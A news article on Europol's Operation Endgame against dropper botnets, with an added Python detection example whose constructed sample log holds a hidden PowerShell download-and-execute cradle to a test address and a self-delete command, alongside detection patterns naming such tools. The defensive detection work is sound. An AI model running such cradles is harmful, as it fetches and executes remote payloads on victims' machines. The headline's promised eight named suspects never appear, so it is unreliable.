
Operation Endgame: Eight Most Wanted Cybercriminals Exposed – Find Out Who They Are!


Massive Europol Operation Shatters Global Cybercrime Ring – See How They Did It

In a massive operation conducted between May 27 and 29, 2024, Europol coordinated an extensive crackdown on some of the most notorious droppers, including IcedID, SystemBC, Pikabot, Smokeloader, Bumblebee, and Trickbot.

Known as Operation Endgame, this initiative aimed to dismantle criminal infrastructures, arrest high-value targets, and freeze illegal assets. The efforts spanned multiple countries, marking the largest-ever operation against botnets, which are integral to the deployment of ransomware.

Unprecedented Global Collaboration

Initiated and led by France, Germany, and the Netherlands, Operation Endgame saw cooperation from a diverse coalition of countries, including Denmark, the United Kingdom, the United States, Armenia, Bulgaria, Lithuania, Portugal, Romania, Switzerland, and Ukraine. Eurojust played a critical role by supporting the operation, which involved over 20 law enforcement officers from Denmark, France, Germany, and the United States coordinating actions from Europol’s command post.


Key Achievements

The coordinated efforts led to significant outcomes:

  • Arrests: Four individuals were arrested (one in Armenia and three in Ukraine).
  • Searches: Sixteen locations were searched (one in Armenia, one in the Netherlands, three in Portugal, and eleven in Ukraine).
  • Infrastructure Disruption: Over 100 servers were taken down or disrupted across Bulgaria, Canada, Germany, Lithuania, the Netherlands, Romania, Switzerland, the United Kingdom, the United States, and Ukraine.
  • Domain Control: More than 2,000 domains were brought under the control of law enforcement.

Through the investigations, authorities discovered that one of the primary suspects had amassed at least EUR 69 million in cryptocurrency by renting out criminal infrastructure sites to deploy ransomware. Legal permissions have been secured to seize these assets in future actions.

The Role of Droppers in Cybercrime

Malware droppers are a crucial component in cyber-attacks, serving as the first stage of infection. These malicious programs are designed to bypass security measures and install additional harmful software onto target systems. Droppers themselves typically cause little direct damage; their job is to stage more destructive payloads, such as ransomware, viruses, and spyware.

Key droppers targeted in Operation Endgame included:

  • SystemBC: Facilitated anonymous communication between infected systems and command-and-control servers.
  • Bumblebee: Delivered and executed further payloads via phishing campaigns or compromised websites.
  • SmokeLoader: Acted as a downloader for additional malicious software.
  • IcedID (BokBot): Originally a banking trojan, it evolved to serve various cybercrimes beyond financial data theft.
  • Pikabot: A trojan used to gain initial access to systems, enabling ransomware deployment and data theft.

Phases of Dropper Operations

Infiltration: Droppers enter systems through email attachments, compromised websites, or bundled with legitimate software.

Execution: They install additional malware onto the victim’s computer, often without the user’s knowledge.

Evasion: Designed to evade detection by security software through code obfuscation, memory-based execution, or impersonating legitimate processes.

Payload Delivery: After deploying the additional malware, droppers may remain inactive or remove themselves to evade detection, leaving the payload to execute malicious activities.
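The four phases above map onto process-creation telemetry that a SOC can actually alert on. What follows is an added example, not code from this article, from Europol, or from any of the partners named below. It runs three hypothetical rules over constructed process-creation events (the log format, the rule names, the file paths and the 203.0.113.5 test-network address are all made up for the example) and then correlates hits per Office-rooted process tree, because a single signal is noisy while a chain of document-borne execution, in-memory download cradle and self-deletion is not.

```python
"""Toy dropper-chain detection over constructed process-creation events.

Rules (hypothetical, for illustration only):
  office_spawns_script_host  - Infiltration/Execution: an Office application
                               launches a script host or PowerShell.
  download_cradle            - Evasion: a script host runs an in-memory
                               download-and-execute cradle.
  self_delete                - Payload Delivery: the dropper deletes its own
                               file after handing off to the payload.
"""
import re
from dataclasses import dataclass

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe", "rundll32.exe"}

# Common download-and-execute cradle fragments (non-exhaustive).
CRADLE_RE = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\s|\bcurl\s|certutil\s+-urlcache)", re.I)
# "cmd /c ... del <file>" pattern used to remove the dropper after it runs.
SELF_DELETE_RE = re.compile(r"cmd(\.exe)?\s+/c\s+.*\bdel\b", re.I)


@dataclass
class Event:
    pid: int
    ppid: int
    image: str      # lower-cased basename of the executable
    cmdline: str


def parse_line(line):
    """Parse the constructed format: pid=<n> ppid=<n> image=<path> cmd=<command line>."""
    m = re.match(r"pid=(\d+) ppid=(\d+) image=(.+?) cmd=(.*)", line)
    if not m:
        raise ValueError(f"unparseable event: {line!r}")
    pid, ppid, image, cmd = m.groups()
    return Event(int(pid), int(ppid), image.rsplit("\\", 1)[-1].lower(), cmd)


def root_office_pid(e, by_pid):
    """Walk up the parent chain and return the nearest Office ancestor's pid, else None."""
    seen, cur = set(), e
    while cur and cur.pid not in seen:       # guard against cyclic/garbled ppid data
        seen.add(cur.pid)
        if cur.image in OFFICE_PARENTS:
            return cur.pid
        cur = by_pid.get(cur.ppid)
    return None


def detect(lines):
    """Return (rule, pid, office_root_pid) for every rule hit, in event order."""
    events = [parse_line(l) for l in lines]
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        root = root_office_pid(e, by_pid)
        parent = by_pid.get(e.ppid)
        if parent and parent.image in OFFICE_PARENTS and e.image in SCRIPT_HOSTS:
            findings.append(("office_spawns_script_host", e.pid, root))
        if e.image in SCRIPT_HOSTS and CRADLE_RE.search(e.cmdline):
            findings.append(("download_cradle", e.pid, root))
        if e.image == "cmd.exe" and SELF_DELETE_RE.search(e.cmdline):
            findings.append(("self_delete", e.pid, root))
    return findings


def score_chains(lines):
    """Group hits by Office-rooted process tree: {root_pid: {rules fired}}.

    Two or more distinct rules under one root is the high-confidence signal;
    a lone hit (e.g. an admin running curl) should stay a low-severity lead.
    """
    chains = {}
    for rule, _pid, root in detect(lines):
        if root is not None:
            chains.setdefault(root, set()).add(rule)
    return chains


# Constructed sample telemetry; not real logs. 203.0.113.5 is a TEST-NET address.
SAMPLE_LOG = [
    r"pid=100 ppid=1 image=C:\Windows\explorer.exe cmd=explorer.exe",
    r"pid=200 ppid=100 image=C:\Program Files\Microsoft Office\WINWORD.EXE cmd=WINWORD.EXE /n invoice.docm",
    r"pid=300 ppid=200 image=C:\Windows\System32\wscript.exe cmd=wscript.exe C:\Users\u\AppData\Local\Temp\inv.js",
    r"pid=400 ppid=300 image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
    r"cmd=powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://203.0.113.5/s')",
    r"pid=500 ppid=300 image=C:\Windows\System32\cmd.exe cmd=cmd.exe /c ping 127.0.0.1 -n 3 & del C:\Users\u\AppData\Local\Temp\inv.js",
    r"pid=600 ppid=100 image=C:\Windows\System32\cmd.exe cmd=cmd.exe /c dir",   # benign, no hit
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_LOG):
        print(hit)
    for root, rules in score_chains(SAMPLE_LOG).items():
        print(f"root pid {root}: {len(rules)} rules -> {'HIGH' if len(rules) >= 2 else 'low'}")
```

The rules are deliberately narrow so the example stays readable; in production the parent/child and command-line matching would come from EDR or Sysmon event ID 1 data, and the cradle and self-delete patterns would be broader. The correlation step is the part worth keeping: it ties each hit back to the document that started the chain, which is also the artifact an incident responder needs first.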

Ongoing Efforts and Future Actions

Operation Endgame is not the conclusion of efforts to combat botnets. New actions will be announced on the Operation Endgame website, providing information for suspects and witnesses to come forward. Europol will continue facilitating intelligence exchanges, crypto-tracing, and forensic support.

The operation also involved extensive support from private partners at both national and international levels, including Bitdefender, Cryptolaemus, Sekoia, Shadowserver, Team Cymru, Prodaft, Proofpoint, NFIR, Computest, Northwave, Fox-IT, HaveIBeenPwned, Spamhaus, and DIVD.

Command Post and Coordination

Europol’s command post coordinated the operational actions, with over 50 coordination calls and an operational sprint at its headquarters. A virtual command post ensured real-time coordination between officers in Armenia, France, Portugal, and Ukraine. Local command posts were established in Germany, the Netherlands, Portugal, the United States, and Ukraine. Eurojust supported the judicial cooperation through its coordination center.

Operation Endgame marks a major victory in the global fight against cybercrime, demonstrating the power of international collaboration and coordinated action. The operation’s success underscores the importance of continued efforts to dismantle criminal networks and protect digital infrastructure worldwide.
